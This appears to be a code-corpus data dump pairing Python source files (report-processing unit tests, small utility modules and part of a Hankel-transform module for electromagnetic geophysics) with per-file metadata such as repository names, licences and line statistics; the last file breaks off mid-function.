self.assertEqual(report_2.state, relations.REPORT_STATE.READY)
self.assertEqual(report_2.data, {'report': [['test_source_1', 'xxx', 333]]})
result = await db.sql('SELECT * FROM subreports WHERE state=%(state)s',
{'state': relations.SUBREPORT_STATE.READY.value})
self.assertEqual(len(result), 1)
self.assertEqual(result[0]['report'], report_1_id)
class FormReportsTests(helpers.BaseTests):
@test_utils.unittest_run_loop
async def test(self):
report_1_id = await operations.create_report_base([("test_source_1", 1)])
report_2_id = await operations.create_report_base([("test_source_1", 333)])
await logic.process_subreports(helpers.get_config()['custom'])
await logic.form_reports(helpers.get_config()['custom'])
report_1 = await operations.get_report(report_1_id)
self.assertEqual(report_1.state, relations.REPORT_STATE.READY)
self.assertEqual(report_1.data, {'report': [['test_source_1', 'type_1', 'data_1'],
['test_source_1', 'type_2', 'data_2']]})
report_2 = await operations.get_report(report_2_id)
self.assertEqual(report_2.state, relations.REPORT_STATE.READY)
self.assertEqual(report_2.data, {'report': [['test_source_1', 'xxx', 333]]})
result = await db.sql('SELECT * FROM subreports WHERE state=%(state)s',
{'state': relations.SUBREPORT_STATE.READY.value})
self.assertEqual(len(result), 0)
class MergeReportTests(helpers.BaseTests):
def test_no_reports(self):
self.assertEqual(logic.merge_report([]), [])
def test_has_reports(self):
self.assertEqual(logic.merge_report([[('a', 'b', 'c'),
('d', 'e', 'f')],
[],
[('a', 'b', 'c'),
('k', 'e', 'f')]]),
[('a', 'b', 'c'),
('d', 'e', 'f'),
('k', 'e', 'f')])
class NormalizeReportTests(helpers.BaseTests):
def test_no_reports(self):
self.assertEqual(logic.normalize_report([]), [])
def test_has_reports(self):
self.assertEqual(logic.normalize_report([('a', 'b', 'c'),
('a', 'b', 'c'),
('k', 'e', 'f'),
('d', 'e', 'f')]),
[('a', 'b', 'c'),
('d', 'e', 'f'),
('k', 'e', 'f')])
class ProcessDeletionRequestTests(helpers.BaseTests):
@test_utils.unittest_run_loop
async def test_no_request(self):
await logic.process_deletion_request(helpers.get_config()['custom'], 666)
@test_utils.unittest_run_loop
async def test_update_request(self):
await operations.mark_for_deletion(core_id=uuid.uuid4().hex,
ids=[('test_source_2', 20),
('test_source_2', 40)])
unprocessed_ids = await operations.get_unprocessed_deletion_requests()
old_request_1 = await operations.get_deletion_request(unprocessed_ids[0])
old_request_2 = await operations.get_deletion_request(unprocessed_ids[1])
await logic.process_deletion_request(helpers.get_config()['custom'], old_request_1.id)
new_request_1 = await operations.get_deletion_request(unprocessed_ids[0])
new_request_2 = await operations.get_deletion_request(unprocessed_ids[1])
self.assertEqual(old_request_2, new_request_2)
self.assertEqual(new_request_1.data['counter'], 1)
@test_utils.unittest_run_loop
async def test_remove_request(self):
await operations.mark_for_deletion(core_id=uuid.uuid4().hex,
ids=[('test_source_2', 20),
('test_source_2', 40)])
unprocessed_ids = await operations.get_unprocessed_deletion_requests()
unprocessed_ids.sort()
old_request_1 = await operations.get_deletion_request(unprocessed_ids[0])
old_request_2 = await operations.get_deletion_request(unprocessed_ids[1])
await logic.process_deletion_request(helpers.get_config()['custom'], old_request_1.id)
await logic.process_deletion_request(helpers.get_config()['custom'], old_request_1.id)
new_request_1 = await operations.get_deletion_request(unprocessed_ids[0])
new_request_2 = await operations.get_deletion_request(unprocessed_ids[1])
self.assertEqual(old_request_2, new_request_2)
self.assertEqual(new_request_1, None)
class ProcessDeletionRequestsTests(helpers.BaseTests):
@test_utils.unittest_run_loop
async def test_no_requests(self):
await logic.process_deletion_requests(helpers.get_config()['custom'])
@test_utils.unittest_run_loop
async def test(self):
await operations.mark_for_deletion(core_id=uuid.uuid4().hex,
ids=[('test_source_2', 20),
('test_source_2', 40)])
await operations.mark_for_deletion(core_id=uuid.uuid4().hex,
ids=[('test_source_1', 1)])
unprocessed_ids = await operations.get_unprocessed_deletion_requests()
unprocessed_ids.sort()
await logic.process_deletion_requests(helpers.get_config()['custom'])
new_request_1 = await operations.get_deletion_request(unprocessed_ids[0])
new_request_2 = await operations.get_deletion_request(unprocessed_ids[1])
new_request_3 = await operations.get_deletion_request(unprocessed_ids[2])
self.assertEqual(new_request_1.data['counter'], 1)
self.assertEqual(new_request_2.data['counter'], 1)
self.assertEqual(new_request_3, None)
await logic.process_deletion_requests(helpers.get_config()['custom'])
new_request_1 = await operations.get_deletion_request(unprocessed_ids[0])
new_request_2 = await operations.get_deletion_request(unprocessed_ids[1])
self.assertEqual(new_request_1, None)
self.assertEqual(new_request_2.data['counter'], 2)
await logic.process_deletion_requests(helpers.get_config()['custom'])
new_request_2 = await operations.get_deletion_request(unprocessed_ids[1])
self.assertEqual(new_request_2, None)
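The MergeReportTests and NormalizeReportTests earlier in this file fully determine the expected behaviour: concatenate subreports, drop duplicate rows, and return them in sorted order. A minimal sketch consistent with those assertions (the project's real logic module may differ):
def merge_report(reports):
    # Flatten the per-source subreports, dedupe, and order deterministically.
    merged = []
    for report in reports:
        merged.extend(report)
    return sorted(set(merged))

def normalize_report(report):
    # Dedupe rows and sort them for stable comparison.
    return sorted(set(report))

assert merge_report([[('a', 'b', 'c'), ('d', 'e', 'f')], [], [('a', 'b', 'c'), ('k', 'e', 'f')]]) == [('a', 'b', 'c'), ('d', 'e', 'f'), ('k', 'e', 'f')]
assert normalize_report([('a', 'b', 'c'), ('a', 'b', 'c'), ('k', 'e', 'f'), ('d', 'e', 'f')]) == [('a', 'b', 'c'), ('d', 'e', 'f'), ('k', 'e', 'f')]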
| 41.993485
| 94
| 0.627056
| 1,472
| 12,892
| 5.173913
| 0.085598
| 0.090599
| 0.073267
| 0.069328
| 0.90218
| 0.872111
| 0.840205
| 0.815651
| 0.784007
| 0.745798
| 0
| 0.019176
| 0.259774
| 12,892
| 306
| 95
| 42.130719
| 0.778896
| 0
| 0
| 0.618357
| 0
| 0
| 0.082073
| 0
| 0
| 0
| 0
| 0
| 0.188406
| 1
| 0.019324
| false
| 0
| 0.038647
| 0
| 0.101449
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 6
| 6fc369c3044b335fa8a550d3e0abd0c9f9daccd6
| 46
| py
| Python
| cride/registros/serializers/__init__.py
| albertoaldanar/serecsinAPI
| ca0f72d42b2e23d4a28cafccef9892055f922bfc
| ["MIT"] | null | null | null |
cride/registros/serializers/__init__.py
| albertoaldanar/serecsinAPI
| ca0f72d42b2e23d4a28cafccef9892055f922bfc
| ["MIT"] | 8
| 2020-06-05T21:51:05.000Z
| 2022-01-13T01:25:00.000Z
| cride/registros/serializers/__init__.py
| albertoaldanar/serecsinAPI
| ca0f72d42b2e23d4a28cafccef9892055f922bfc
| ["MIT"] | null | null | null |
from .egresos import *
from .ingresos import *
| 23
| 23
| 0.76087
| 6
| 46
| 5.833333
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152174
| 46
| 2
| 23
| 23
| 0.897436
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 6
| 6ff02bd2f42ed39d7d8f4244b21070128a64aac6
| 122
| py
| Python
| mmdet/ops/nms/__init__.py
| Lanselott/mmdetection
| 03ce0a87f4d52f4adf4f78fd39ad30b2da394376
| ["Apache-2.0"] | null | null | null |
mmdet/ops/nms/__init__.py
| Lanselott/mmdetection
| 03ce0a87f4d52f4adf4f78fd39ad30b2da394376
| ["Apache-2.0"] | null | null | null |
mmdet/ops/nms/__init__.py
| Lanselott/mmdetection
| 03ce0a87f4d52f4adf4f78fd39ad30b2da394376
| ["Apache-2.0"] | null | null | null |
from .nms_wrapper import nms, soft_nms#, nms_v2
# __all__ = ['nms', 'soft_nms', 'nms_v2']
__all__ = ['nms', 'soft_nms']
| 20.333333
| 47
| 0.655738
| 19
| 122
| 3.473684
| 0.368421
| 0.318182
| 0.454545
| 0.393939
| 0.69697
| 0.69697
| 0.69697
| 0.69697
| 0.69697
| 0
| 0
| 0.019231
| 0.147541
| 122
| 5
| 48
| 24.4
| 0.615385
| 0.393443
| 0
| 0
| 0
| 0
| 0.15493
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 6
| b50541daeae13c620908e8f969d87720a6622e34
| 45
| py
| Python
| alphabets.py
| Jing-lun/GPR_dilectric_prediction
| c841f6b17ce56cfd8963799ec00d4d54b1dba7c9
| ["MIT"] | null | null | null |
alphabets.py
| Jing-lun/GPR_dilectric_prediction
| c841f6b17ce56cfd8963799ec00d4d54b1dba7c9
| ["MIT"] | null | null | null |
alphabets.py
| Jing-lun/GPR_dilectric_prediction
| c841f6b17ce56cfd8963799ec00d4d54b1dba7c9
| ["MIT"] | null | null | null |
alphabet = """1
2
3
4
5
6
7
8
9
10
11
12
"""
| 3.214286
| 15
| 0.511111
| 13
| 45
| 1.769231
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 0.333333
| 45
| 13
| 16
| 3.461538
| 0.266667
| 0
| 0
| 0
| 0
| 0
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 6
| d21ea2724b9e7bdaeeba4a6b5803297a237a0ad3
| 352
| py
| Python
| tests/test_metaclass/test_metaclass.py
| bakkerthehacker/both
| 37bfdc41c97476cb74dced06570f5988356e4984
| ["MIT"] | 6
| 2019-06-04T04:00:45.000Z
| 2021-01-23T22:36:37.000Z
| tests/test_metaclass/test_metaclass.py
| bakkerthehacker/both
| 37bfdc41c97476cb74dced06570f5988356e4984
| ["MIT"] | null | null | null |
tests/test_metaclass/test_metaclass.py
| bakkerthehacker/both
| 37bfdc41c97476cb74dced06570f5988356e4984
| ["MIT"] | null | null | null |
# -*- coding: utf-8 -*-
def test_metaclass_py2():
    import tests.test_metaclass.metaclass_py2 as metaclass_py2
    assert type(metaclass_py2.TestMetaAndBase) is metaclass_py2.TestMeta

def test_metaclass_py3():
    import tests.test_metaclass.metaclass_py3 as metaclass_py3
    assert type(metaclass_py3.TestMetaAndBase) is metaclass_py3.TestMeta
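The metaclass_py2 / metaclass_py3 modules imported above are not part of this record. A hypothetical sketch of the py3 variant, showing only the minimal shape that satisfies type(TestMetaAndBase) is TestMeta:
class TestMeta(type):
    pass

class TestBase:
    pass

class TestMetaAndBase(TestBase, metaclass=TestMeta):
    # Declared with both a base class and a metaclass, hence the name.
    pass

assert type(TestMetaAndBase) is TestMeta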
| 29.333333
| 72
| 0.795455
| 47
| 352
| 5.659574
| 0.340426
| 0.225564
| 0.120301
| 0.180451
| 0.24812
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035831
| 0.127841
| 352
| 11
| 73
| 32
| 0.830619
| 0.059659
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 6
| d22e98b97c4db93c8c0b0a7342b39bce54fd8b93
| 161
| py
| Python
| server/snippet.py
| NikPrav/InterIIT_Bosch
| cdc3554eb4a3492b04e6667c9d446553c3676819
| ["CNRI-Python", "Linux-OpenIB"] | null | null | null |
server/snippet.py
| NikPrav/InterIIT_Bosch
| cdc3554eb4a3492b04e6667c9d446553c3676819
| ["CNRI-Python", "Linux-OpenIB"] | null | null | null |
server/snippet.py
| NikPrav/InterIIT_Bosch
| cdc3554eb4a3492b04e6667c9d446553c3676819
| ["CNRI-Python", "Linux-OpenIB"] | null | null | null |
from dbmodels import Workspace
def add_training_progress(workspace_id, dict_):
    Workspace.objects(workspace_id=workspace_id).update_one(state=dict_).save()
| 26.833333
| 79
| 0.819876
| 22
| 161
| 5.636364
| 0.681818
| 0.266129
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 161
| 5
| 80
| 32.2
| 0.843537
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 6
| 9660246c13fa2c2ce6baa1781fdd3e528b10be8f
| 77
| py
| Python
| helloworld.py
| AngelinaYadav/python-programming
| 9ae4d698dc67da854b6f2351989775b18f6634f1
| ["Apache-2.0"] | null | null | null |
helloworld.py
| AngelinaYadav/python-programming
| 9ae4d698dc67da854b6f2351989775b18f6634f1
| ["Apache-2.0"] | null | null | null |
helloworld.py
| AngelinaYadav/python-programming
| 9ae4d698dc67da854b6f2351989775b18f6634f1
| ["Apache-2.0"] | null | null | null |
"""
write your first program in python
"""
print("helloworld in python !!")
| 12.833333
| 34
| 0.675325
| 10
| 77
| 5.2
| 0.8
| 0.307692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.168831
| 77
| 5
| 35
| 15.4
| 0.8125
| 0.441558
| 0
| 0
| 0
| 0
| 0.657143
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 6
| 967588c1485339ee277008cacbcd20b8bb133e02
| 79
| py
| Python
| src/hierarchy/simulation/base/__init__.py
| drvinceknight/HierarchicalPromotion
| 8fce38c4dc9b21f50a8ef769482fd6a82cf0e6a3
| ["MIT"] | null | null | null |
src/hierarchy/simulation/base/__init__.py
| drvinceknight/HierarchicalPromotion
| 8fce38c4dc9b21f50a8ef769482fd6a82cf0e6a3
| ["MIT"] | 7
| 2019-10-01T06:47:05.000Z
| 2020-11-18T13:10:20.000Z
| src/hierarchy/simulation/base/__init__.py
| drvinceknight/HierarchicalPromotion
| 8fce38c4dc9b21f50a8ef769482fd6a82cf0e6a3
| ["MIT"] | null | null | null |
from .simulation import get_simulated_history, get_simulated_stationary_vector
| 39.5
| 78
| 0.911392
| 10
| 79
| 6.7
| 0.8
| 0.358209
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.063291
| 79
| 1
| 79
| 79
| 0.905405
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 6
| 96b88b0ef660b44a6a745a1b675a353f12c93de9
| 48,134
| py
| Python
| emulatte/core/transform.py
| WasedaGeophysics/w1dem
| 487e117ad0f7b74367f22ad404bd4f6adf473a7b
| ["Apache-2.0"] | 1
| 2021-12-13T00:15:20.000Z
| 2021-12-13T00:15:20.000Z
| emulatte/core/transform.py
| WasedaGeophysics/w1dem
| 487e117ad0f7b74367f22ad404bd4f6adf473a7b
| ["Apache-2.0"] | null | null | null |
emulatte/core/transform.py
| WasedaGeophysics/w1dem
| 487e117ad0f7b74367f22ad404bd4f6adf473a7b
| ["Apache-2.0"] | null | null | null |
# Copyright 2021 Waseda Geophysics Laboratory
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -*- coding: utf-8 -*-
"""
Class methods used for the Hankel transform and for FD <-> TD conversion.
Class List
* HankelTransform
* FourierTransform
"""
import numpy as np
from emulatte.core import kernels, filters
class HankelTransform:
"""Hankel Transform
Computation of responses via the Hankel transform.
Index:
vmd
hmdx
hmdy
ved
hedx
hedy
circular_loop
coincident_loop
grounded_wire
loop_source
x_line_source
y_line_source
"""
@staticmethod
def vmd(model, omega):
"""
"""
y_base, wt0, wt1 = filters.load_hankel_filter(model.hankel_filter)
model.filter_length = len(y_base)
model.lambda_ = y_base/model.r
kernel = kernels.compute_kernel_vmd(model, omega)
ans = {}
e_phi = np.dot(wt1, kernel[0]) / model.r
h_r = np.dot(wt1, kernel[1]) / model.r
h_z = np.dot(wt0, kernel[2]) / model.r
ans["e_x"] = -1 / (4 * np.pi) * model.ztilde[model.slayer - 1] \
* -model.sin_phi * e_phi
ans["e_y"] = -1 / (4 * np.pi) * model.ztilde[model.slayer - 1] \
* model.cos_phi * e_phi
ans["e_z"] = 0
ans["h_x"] = 1 / (4 * np.pi) * model.cos_phi * h_r
ans["h_y"] = 1 / (4 * np.pi) * model.sin_phi * h_r
ans["h_z"] = 1 / (4 * np.pi) * model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] * h_z
return ans
@staticmethod
def hmdx(model, omega):
"""
"""
y_base, wt0, wt1 = filters.load_hankel_filter(model.hankel_filter)
model.filter_length = len(y_base)
model.lambda_ = y_base / model.r
kernel = kernels.compute_kernel_hmd(model, omega)
ans = {}
tm_er_1 = np.dot(wt0, kernel[0] * model.lambda_) / model.r
tm_er_2 = np.dot(wt1, kernel[0]) / model.r
te_er_1 = np.dot(wt0, kernel[1] * model.lambda_) / model.r
te_er_2 = np.dot(wt1, kernel[1]) / model.r
tm_ez = np.dot(wt1, kernel[2] * model.lambda_**2) / model.r
tm_hr_1 = np.dot(wt0, kernel[3] * model.lambda_) / model.r
tm_hr_2 = np.dot(wt1, kernel[3]) / model.r
te_hr_1 = np.dot(wt0, kernel[4] * model.lambda_) / model.r
te_hr_2 = np.dot(wt1, kernel[4]) / model.r
te_hz = np.dot(wt1, kernel[5] * model.lambda_**2) / model.r
amp_tm_ex_1 = -(model.ztilde * model.ytilde)[model.slayer - 1] \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ (4 * np.pi * model.ytilde[model.rlayer - 1] \
* model.r ** 2)
amp_tm_ex_2 = (model.ztilde * model.ytilde)[model.slayer - 1] \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ (2 * np.pi * model.ytilde[model.rlayer - 1] \
* model.r ** 3)
amp_te_ex_1 = - model.ztilde[model.slayer - 1] \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ (4 * np.pi * model.r ** 2)
amp_te_ex_2 = model.ztilde[model.slayer - 1] \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ (2 * np.pi * model.r ** 3)
amp_tm_ey_1 = -(model.ztilde * model.ytilde)[model.slayer - 1] \
* (model.ry - model.sy) ** 2 \
/ (4 * np.pi * model.ytilde[model.rlayer - 1] \
* model.r ** 2)
amp_tm_ey_2 = (model.ztilde * model.ytilde)[model.slayer - 1] \
/ (4 * np.pi * model.ytilde[model.rlayer - 1]) \
* (2 * (model.ry - model.sy) ** 2 / model.r ** 3 - 1 \
/ model.r)
amp_te_ey_1 = model.ztilde[model.slayer - 1] \
* (model.rx - model.sx) ** 2 \
/ (4 * np.pi * model.r ** 2)
amp_te_ey_2 = -model.ztilde[model.slayer - 1] \
/ (4 * np.pi) * (2 * (model.rx - model.sx) ** 2 \
/ model.r ** 3 - 1 / model.r)
amp_tm_ez = - model.ztilde[model.slayer - 1] \
* (model.ry - model.sy) / (4 * np.pi * model.r)
amp_tm_hx_1 = model.k[model.slayer - 1] ** 2 \
* (model.ry - model.sy) ** 2 / model.r ** 2 \
/ (4 * np.pi)
amp_tm_hx_2 = - model.k[model.slayer - 1] ** 2 \
* (2 * (model.ry - model.sy) ** 2 / model.r ** 3 \
- 1 / model.r) / (4 * np.pi)
amp_te_hx_1 = (model.rx - model.sx) ** 2 / (4 * np.pi * model.r ** 2)\
* model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1]
amp_te_hx_2 = - model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
* (2 * (model.rx - model.sx) ** 2 / model.r ** 2 - 1)\
/ model.r / (4 * np.pi)
amp_tm_hy_1 = -model.k[model.slayer - 1]** 2 / (4 * np.pi) \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ model.r ** 2
amp_tm_hy_2 = - amp_tm_hy_1 / model.r * 2
amp_te_hy_1 = model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
/ (4 * np.pi) * (model.rx - model.sx) \
* (model.ry - model.sy) / model.r ** 2
amp_te_hy_2 = -model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
/ (2 * np.pi) * (model.rx - model.sx) \
* (model.ry - model.sy) / model.r ** 3
amp_te_hz = model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
* (model.rx - model.sx) / (4 * np.pi * model.r)
ans["e_x"] = amp_tm_ex_1 * tm_er_1 + amp_tm_ex_2 * tm_er_2 \
+ amp_te_ex_1 * te_er_1 + amp_te_ex_2 * te_er_2
ans["e_y"] = amp_tm_ey_1 * tm_er_1 + amp_tm_ey_2 * tm_er_2 \
+ amp_te_ey_1 * te_er_1 + amp_te_ey_2 * te_er_2
ans["e_z"] = amp_tm_ez * tm_ez
ans["h_x"] = amp_tm_hx_1 * tm_hr_1 + amp_tm_hx_2 * tm_hr_2 \
+ amp_te_hx_1 * te_hr_1 + amp_te_hx_2 * te_hr_2
ans["h_y"] = amp_tm_hy_1 * tm_hr_1 + amp_tm_hy_2 * tm_hr_2 \
+ amp_te_hy_1 * te_hr_1 + amp_te_hy_2 * te_hr_2
ans["h_z"] = amp_te_hz * te_hz
return ans
@staticmethod
def hmdy(model, omega):
"""
"""
y_base, wt0, wt1 = filters.load_hankel_filter(model.hankel_filter)
model.filter_length = len(y_base)
model.lambda_ = y_base / model.r
kernel = kernels.compute_kernel_hmd(model, omega)
ans = {}
tm_er_1 = np.dot(wt0, kernel[0] * model.lambda_) / model.r
tm_er_2 = np.dot(wt1, kernel[0]) / model.r
te_er_1 = np.dot(wt0, kernel[1] * model.lambda_) / model.r
te_er_2 = np.dot(wt1, kernel[1]) / model.r
tm_ez = np.dot(wt1, kernel[2] * model.lambda_**2) / model.r
tm_hr_1 = np.dot(wt0, kernel[3] * model.lambda_) / model.r
tm_hr_2 = np.dot(wt1, kernel[3]) / model.r
te_hr_1 = np.dot(wt0, kernel[4] * model.lambda_) / model.r
te_hr_2 = np.dot(wt1, kernel[4]) / model.r
te_hz = np.dot(wt1, kernel[5]* model.lambda_**2) / model.r
amp_tm_ex_1 = (model.ztilde * model.ytilde)[model.slayer - 1] \
* (model.rx - model.sx) ** 2 \
/ (4 * np.pi * model.ytilde[model.rlayer - 1] \
* model.r ** 2)
amp_tm_ex_2 = -(model.ztilde * model.ytilde)[model.slayer - 1] \
/ (4 * np.pi * model.ytilde[model.rlayer - 1]) \
* (2 * (model.rx - model.sx) ** 2 / model.r ** 3 \
- 1 / model.r)
amp_te_ex_1 = -model.ztilde[model.slayer - 1] \
* (model.ry - model.sy) ** 2 \
/ (4 * np.pi * model.r ** 2)
amp_te_ex_2 = model.ztilde[model.slayer - 1] / (4 * np.pi) \
* (2 * (model.ry - model.sy) ** 2 / model.r ** 3 \
- 1 / model.r)
amp_tm_ey_1 = (model.ztilde * model.ytilde)[model.slayer - 1] \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ (4 * np.pi * model.ytilde[model.rlayer - 1] \
* model.r ** 2)
amp_tm_ey_2 = -(model.ztilde * model.ytilde)[model.slayer - 1] \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ (2 * np.pi * model.ytilde[model.rlayer - 1] \
* model.r ** 3)
amp_te_ey_1 = model.ztilde[model.slayer - 1] \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ (4 * np.pi * model.r ** 2)
amp_te_ey_2 = - model.ztilde[model.slayer - 1] \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ (2 * np.pi * model.r ** 3)
amp_tm_ez = -(model.ztilde * model.ytilde)[model.slayer - 1] \
* (model.rx - model.sx) \
/ (4 * np.pi * model.ytilde[model.rlayer - 1] \
* model.r)
amp_tm_hx_1 = (model.ztilde * model.ytilde)[model.slayer - 1] \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ (4 * np.pi * model.r ** 2)
amp_tm_hx_2 = - amp_tm_hx_1 * 2 / model.r
amp_te_hx_1 = model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
* (model.rx - model.sx) * (model.ry - model.sy) \
/ (4 * np.pi * model.r ** 2)
amp_te_hx_2 = - amp_te_hx_1* 2 / model.r
amp_tm_hy_1 = -(model.ztilde * model.ytilde)[model.slayer - 1] \
* (model.rx - model.sx) ** 2 \
/ (4 * np.pi * model.r ** 2)
amp_tm_hy_2 = (model.ztilde * model.ytilde)[model.slayer - 1] \
* (2 * (model.rx - model.sx) ** 2 / model.r ** 3 \
- 1 / model.r) / (4 * np.pi)
amp_te_hy_1 = model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
* (model.ry - model.sy) ** 2 \
/ (4 * np.pi * model.r ** 2)
amp_te_hy_2 = - model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
* (2 * (model.ry - model.sy) ** 2 / model.r ** 3 \
- 1 / model.r) / (4 * np.pi)
amp_te_hz = model.ztilde[model.slayer - 1] \
/ model.ztilde[model.rlayer - 1] \
* (model.ry - model.sy) / (4 * np.pi * model.r)
ans["e_x"] = amp_tm_ex_1 * tm_er_1 + amp_tm_ex_2 * tm_er_2 \
+ amp_te_ex_1 * te_er_1 + amp_te_ex_2 * te_er_2
ans["e_y"] = amp_tm_ey_1 * tm_er_1 + amp_tm_ey_2 * tm_er_2 \
+ amp_te_ey_1 * te_er_1 + amp_te_ey_2 * te_er_2
ans["e_z"] = amp_tm_ez * tm_ez
ans["h_x"] = amp_tm_hx_1 * tm_hr_1 + amp_tm_hx_2 * tm_hr_2 \
+ amp_te_hx_1 * te_hr_1 + amp_te_hx_2 * te_hr_2
ans["h_y"] = amp_tm_hy_1 * tm_hr_1 + amp_tm_hy_2 * tm_hr_2 \
+ amp_te_hy_1 * te_hr_1 + amp_te_hy_2 * te_hr_2
ans["h_z"] = amp_te_hz * te_hz
return ans
@staticmethod
def ved(model, omega):
"""
"""
y_base, wt0, wt1 = filters.load_hankel_filter(model.hankel_filter)
model.filter_length = len(y_base)
model.lambda_ = y_base / model.r
kernel = kernels.compute_kernel_ved(model, omega)
ans = {}
e_phai = np.dot(wt1, kernel[0] * model.lambda_ ** 2) / model.r
e_z = np.dot(wt0, kernel[1] * model.lambda_ ** 3) / model.r
h_r = np.dot(wt1, kernel[2] * model.lambda_ ** 2) / model.r
ans["e_x"] = -1 / (4 * np.pi * model.ytilde[model.rlayer - 1]) \
* model.cos_phi * e_phai
ans["e_y"] = -1 / (4 * np.pi * model.ytilde[model.rlayer - 1]) \
* model.sin_phi * e_phai
ans["e_z"] = 1 / (4 * np.pi * model.ytilde[model.rlayer - 1]) \
* e_z
ans["h_x"] = -1 / (4 * np.pi) * model.sin_phi * h_r
ans["h_y"] = -1 / (4 * np.pi) * model.cos_phi * h_r
ans["h_z"] = 0
return ans
@staticmethod
def hedx(model, omega):
"""
"""
y_base, wt0, wt1 = filters.load_hankel_filter(model.hankel_filter)
model.filter_length = len(y_base)
model.lambda_ = y_base / model.r
kernel = kernels.compute_kernel_hed(model, omega)
ans = {}
tm_er_1 = np.dot(wt0, kernel[0] * model.lambda_) / model.r
tm_er_2 = np.dot(wt1, kernel[0]) / model.r
